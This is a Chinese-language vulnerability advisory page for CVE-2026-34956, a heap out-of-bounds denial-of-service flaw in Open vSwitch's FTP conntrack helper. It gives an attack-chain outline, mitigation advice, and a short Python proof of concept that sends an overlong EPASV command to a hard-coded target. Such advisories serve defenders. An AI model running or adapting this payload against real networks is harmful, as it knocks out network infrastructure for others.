CVE-2026-34956 CVSS 5.9 中危

Open vSwitch EPASV命令处理漏洞致拒绝服务

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34956

漏洞类型

缓冲区溢出

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open vSwitch

漏洞概述

Open vSwitch在配置使用FTP辅助的conntrack流且经过用户空间数据路径时存在漏洞。远程攻击者可发送包含超长EPASV命令的特制FTP数据流。由于系统未能正确处理超过255字符的EPASV命令，导致堆访问错误，进而引发系统崩溃，造成拒绝服务。

技术细节

该漏洞发生在Open vSwitch的用户空间数据路径处理FTP协议辅助模块的过程中。当配置了conntrack流并使用FTP helper时，OVS负责解析FTP控制通道中的命令以动态跟踪数据连接。漏洞的具体触发点在于对EPASV（Extended Passive Mode）命令参数的解析。代码未能正确检查参数长度，当接收到超过255字节的EPASV命令时，会在堆上执行越界读取或写入操作。这种内存破坏行为会导致段错误或堆损坏，进而导致ovs-vswitchd等关键进程崩溃。由于攻击可以通过网络远程发起且无需身份验证，这对网络基础设施的可用性构成了严重威胁。

攻击链分析

STEP 1

侦察

攻击者识别目标网络中使用了Open vSwitch，并确认其启用了FTP conntrack helper功能。

STEP 2

构建攻击载荷

攻击者构造一个特制的FTP数据包，其中包含参数长度超过255字节的EPASV命令。

STEP 3

发送恶意数据

攻击者通过网络将恶意FTP流发送至目标Open vSwitch设备。

STEP 4

触发漏洞

Open vSwitch在用户空间数据路径解析该EPASV命令时，发生堆访问越界错误。

STEP 5

系统崩溃

堆内存错误导致Open vSwitch守护进程（如ovs-vswitchd）崩溃，引发拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Target configuration
TARGET_HOST = "192.168.1.1"
TARGET_PORT = 21

def send_exploit():
    try:
        # Establish TCP connection
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_HOST, TARGET_PORT))
        
        # Receive FTP banner
        banner = s.recv(1024)
        print(banner.decode())
        
        # Construct malicious EPASV command
        # The vulnerability is triggered when the EPASV command argument exceeds 255 characters
        payload = "EPASV " + "A" * 300 + "\r\n"
        
        # Send payload
        s.send(payload.encode())
        
        # Attempt to receive response (service may crash)
        response = s.recv(1024)
        print(response.decode())
        
    except Exception as e:
        print(f"Connection error or crash: {e}")
    finally:
        s.close()

if __name__ == "__main__":
    send_exploit()

影响范围

Open vSwitch (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施

在应用官方补丁之前，建议管理员临时禁用Open vSwitch中的FTP连接跟踪辅助功能。可以通过修改流表配置或移除相关FTP helper规则来实现。此外，应密切监控OVS服务的运行状态，以便在发生攻击时快速响应。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表